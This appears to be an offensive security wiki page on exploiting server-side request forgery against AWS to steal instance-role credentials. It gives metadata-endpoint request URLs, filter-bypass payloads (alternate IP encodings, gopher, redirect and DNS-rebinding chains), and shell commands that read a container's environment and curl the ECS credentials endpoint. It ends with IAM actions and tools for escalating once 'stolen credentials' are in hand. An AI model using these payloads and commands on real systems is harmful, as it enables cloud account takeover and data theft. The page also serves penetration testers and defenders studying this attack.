SSRF

When a web application running on EC2 can be coerced into making a request to an attacker-chosen URL, point it at the metadata endpoint and the response hands back the instance role's credentials. This is the bridge between a web vulnerability and full cloud credentials, and it is why SSRF is treated as a cloud-credential technique.

The core request#

code
# any SSRF sink: image fetcher, webhook, URL preview, PDF renderer
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>

On IMDSv2 the app must be coaxed into a PUT for the token and into sending the token header; see IMDSv2. Where only a GET is possible, an instance left on IMDSv1 returns credentials directly.

Bypasses when the literal IP is filtered#

code
http://169.254.169.254/      ->  http://[::ffff:169.254.169.254]/
                                  http://2852039166/            (decimal)
                                  http://metadata.google.internal (wrong cloud, but test)
                                  gopher://169.254.169.254/...  (where the fetcher honors gopher)
# DNS rebinding and redirect-based bypasses where the fetcher follows 3xx
# open-redirect chain: SSRF -> an attacker redirector -> 169.254.169.254

ECS and Fargate#

Tasks do not use 169.254.169.254; they expose credentials on a per-task path behind 169.254.170.2. Read the relative URI from the task's own environment, then fetch it, which an in-task SSRF can reach with a plain GET and no token dance:

bash
cat /proc/self/environ | tr '\0' '\n' | grep AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

Exploitation notes#

  • The web SSRF mechanics (sinks, filters, redirect and DNS-rebinding bypasses) live in request forgery; this page is only the AWS payload.
  • Once the role credentials are exported, the role's own rights may mint more: sts:AssumeRole, iam:CreateAccessKey, ecr:GetAuthorizationToken, cognito-identity:GetCredentialsForIdentity, redshift:GetClusterCredentials, sso:GetRoleCredentials, lightsail:GetInstanceAccessDetails, and rds-db connect tokens; see credential brokers.

Tools#

  • Burp Suite / custom scripts to drive the SSRF sink.
  • Pacu once the stolen credentials are exported.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more